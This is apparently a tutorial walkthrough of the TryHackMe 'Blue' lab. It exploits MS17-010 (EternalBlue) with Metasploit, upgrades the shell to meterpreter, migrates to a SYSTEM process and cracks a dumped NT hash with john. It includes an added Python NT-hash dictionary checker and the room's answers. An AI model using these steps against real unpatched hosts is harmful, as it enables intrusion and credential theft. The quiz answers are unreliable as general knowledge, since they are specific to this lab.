Tryhackme Blue Walkthrough

Room Link: https://tryhackme.com/room/blue

discovery

we don't know the IP of the target, so let's do a netdiscover scan to find it.

sudo netdiscover -i eth0 -r 10.0.2.0/24

now we know the IP of the target: 10.0.2.21

enumeration

now let's first do an Nmap scan.

sudo nmap -sC -sV -A (the target's IP) -oN nmap.txt

first question: How many ports are open with a port number under 1000?

ans: 3
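As an added example (not part of the original walkthrough), here is a small Python parser for nmap's -oN "normal" output that answers the first question by counting open ports below 1000. The scan text embedded below is constructed to look like a Windows SMB host's port table; it is not the room's real scan output.

```python
import re

# Constructed sample of nmap -oN output (not the room's real scan): a few
# Windows-style services plus one filtered port and the high RPC ports.
SAMPLE_NMAP_TXT = """\
# Nmap 7.93 scan initiated as: nmap -sC -sV -A 10.0.2.21 -oN nmap.txt
Nmap scan report for 10.0.2.21
Host is up (0.00031s latency).
Not shown: 990 closed tcp ports (reset)
PORT      STATE    SERVICE        VERSION
135/tcp   open     msrpc          Microsoft Windows RPC
139/tcp   open     netbios-ssn    Microsoft Windows netbios-ssn
445/tcp   open     microsoft-ds   Windows 7 Professional 7601 Service Pack 1 microsoft-ds
3389/tcp  open     ms-wbt-server  Microsoft Terminal Service
8080/tcp  filtered http-proxy
49152/tcp open     msrpc          Microsoft Windows RPC
49153/tcp open     msrpc          Microsoft Windows RPC
49154/tcp open     msrpc          Microsoft Windows RPC
49158/tcp open     msrpc          Microsoft Windows RPC
49159/tcp open     msrpc          Microsoft Windows RPC
# Nmap done at ... -- 1 IP address (1 host up) scanned in 70.12 seconds
"""

# A port line starts with "<port>/<proto>", then the state (which may be a
# compound like "open|filtered"), then the service name.
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>[\w|]+)\s+(?P<service>\S+)"
)


def parse_ports(nmap_text):
    """Return (port, proto, state, service) tuples for every port line."""
    results = []
    for line in nmap_text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            results.append((int(m["port"]), m["proto"], m["state"], m["service"]))
    return results


def open_ports(nmap_text):
    """Port numbers reported as open, in file order."""
    return [p for p, _, state, _ in parse_ports(nmap_text) if state == "open"]


def count_open_below(nmap_text, limit=1000):
    """Number of open ports with a port number under `limit` (the first question)."""
    return sum(1 for p in open_ports(nmap_text) if p < limit)


if __name__ == "__main__":
    for port, proto, state, service in parse_ports(SAMPLE_NMAP_TXT):
        print(f"{port}/{proto:<4} {state:<9} {service}")
    print("open ports under 1000:", count_open_below(SAMPLE_NMAP_TXT))
```

Point it at a real file with `count_open_below(open("nmap.txt").read())`; filtered or open|filtered ports are parsed but not counted, which is the distinction the question relies on.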

second question: What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)

for this let's do a vuln script scan.

sudo nmap -sC -A --script=vuln (IP address) -oN scriptscan.txt

note: this will take some time.

ans: ms17-010

exploitation

we have found that the machine is vulnerable to ms17-010.

so let's search for the Metasploit module.

searchsploit ms17-010

https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue/

and now we found that the Metasploit module is exploit/windows/smb/ms17_010_eternalblue.


third question: Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/……..)

ans: exploit/windows/smb/ms17_010_eternalblue

now let us start Metasploit,

msfconsole

now let us use the module

use exploit/windows/smb/ms17_010_eternalblue

now let us set the options.

type options

4th question: Show options and set the one required value. What is the name of this value? (All caps for submission)

ans: RHOSTS

now let's set RHOSTS, LHOST and LPORT (optional)

set RHOSTS (IP of the target)

set LHOST (IP of your machine)

HOHO, now we are ready to run the exploit; type “run” to do it.

WOW, now we are in.

now let us background this and upgrade the shell to a meterpreter session for more anonymity and more control.

to do it press ctrl+z

it is now done.

escalation

question 5: If you haven’t already, background the previously gained shell (CTRL + Z). Research online on how to convert a shell to meterpreter shell in Metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected)

now to find this, search for shell_to_meterpreter in msfconsole

ans: post/multi/manage/shell_to_meterpreter

now let's use this post module

by typing “use post/multi/manage/shell_to_meterpreter”

now let us see what options we need to set by typing “options”

now we know that we need to set the SESSION option, because we already have the session running in the background

question 6: Select this (use MODULE_PATH). Show options, what option are we required to change? (All caps for answer)

ans: “SESSION”

now let us do this by searching for active sessions by typing “sessions”

now set the session by typing “set SESSION 1”

now type run to execute it

now we are good to go again; list sessions and switch to the meterpreter session by typing “sessions -i 2”

now we are in

hooorayyyy

now let us migrate to a process running as NT AUTHORITY\SYSTEM

to do this first list all the processes by typing “ps”

now let us migrate to 1828 by typing “migrate 1828”

now we have the password hash of the user named Jon.

now let us crack the hash using john the ripper

to do that, make a txt file and paste in the hash you got

now use the command

“john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=NT”

and then to show the password type “john hash.txt --show --format=NT”

question 7: Copy this password hash to a file and research how to crack it. What is the cracked password?

ans: alqfna22
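As an added example (not part of the original walkthrough), here is a pure-Python model of what john is doing with that hash, which also shows why --format=NT is the right flag and why the hash falls to rockyou.txt so quickly: an MD4 implementation, the NT hash (MD4 over the UTF-16LE password, unsalted and single-pass), a parser for the user:rid:LM:NT::: line that hashdump prints, and a dictionary check. The account "Alice", its password and the wordlist are constructed in the code; nothing here is Jon's real hash from the box.

```python
import struct

MASK = 0xFFFFFFFF
# Value hashdump prints in the LM field when LM hashes are not stored (LM of an empty string).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"


def _rol(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data):
    """MD4 per RFC 1320 in pure Python (hashlib on OpenSSL 3 builds often lacks md4)."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    # pad to 56 mod 64 bytes, then append the message bit length as little-endian 64-bit
    padded = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", len(data) * 8)
    for off in range(0, len(padded), 64):
        X = struct.unpack("<16I", padded[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):                                   # round 1
            a = _rol((a + F(b, c, d) + X[i]) & MASK, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                                   # round 2
            k = (i % 4) * 4 + i // 4
            a = _rol((a + G(b, c, d) + X[k] + 0x5A827999) & MASK, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                                   # round 3
            k = (0, 8, 4, 12)[i % 4] + (0, 2, 1, 3)[i // 4]
            a = _rol((a + H(b, c, d) + X[k] + 0x6ED9EBA1) & MASK, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & MASK, (b + bb) & MASK, (c + cc) & MASK, (d + dd) & MASK
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password):
    """NT hash: MD4 of the UTF-16LE password. No salt, one pass: one MD4 per guess."""
    return md4(password.encode("utf-16le")).hex()


def parse_pwdump_line(line):
    """Split a hashdump line 'user:rid:LM:NT:::' and sanity-check the two hex fields."""
    parts = line.strip().split(":")
    if len(parts) < 4:
        raise ValueError("expected user:rid:LM:NT:::")
    user, rid, lm, nt = parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()
    for h in (lm, nt):
        if len(h) != 32 or any(ch not in "0123456789abcdef" for ch in h):
            raise ValueError("hash field is not 32 hex characters: %r" % h)
    return user, rid, lm, nt


def dictionary_check(nt_hex, candidates):
    """What a wordlist run does: hash each candidate and compare; None if nothing matches."""
    nt_hex = nt_hex.lower()
    for word in candidates:
        if nt_hash(word) == nt_hex:
            return word
    return None


# Constructed sample: a hashdump-style line for a made-up account with LM storage disabled.
SAMPLE_PASSWORD = "winter2020"
SAMPLE_LINE = "Alice:1001:%s:%s:::" % (EMPTY_LM, nt_hash(SAMPLE_PASSWORD))
SAMPLE_WORDLIST = ["123456", "password", "letmein", "winter2020", "qwerty"]

if __name__ == "__main__":
    user, rid, lm, nt = parse_pwdump_line(SAMPLE_LINE)
    print("LM field is the empty-LM marker:", lm == EMPTY_LM)   # so john needs --format=NT
    print(user, "->", dictionary_check(nt, SAMPLE_WORDLIST))
```

The empty-LM marker is why the LM half of the line is useless and john has to be told --format=NT; the single unsalted MD4 per guess is why a dictionary of a few million words runs in seconds on a laptop, and why a password that appears in rockyou.txt offers no protection regardless of how strong the SMB exploit was.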

flag finding

now let us find the flags

the first flag is found in C:\

to get it, first go to the shell by typing “shell”

now list the files by typing “dir”

you can see flag1.txt; to read the flag use the command “type flag1.txt”

now let us find the second flag

the second flag's location is \Windows\System32\config

the third flag is located in \Users\Jon\Documents

Thanks,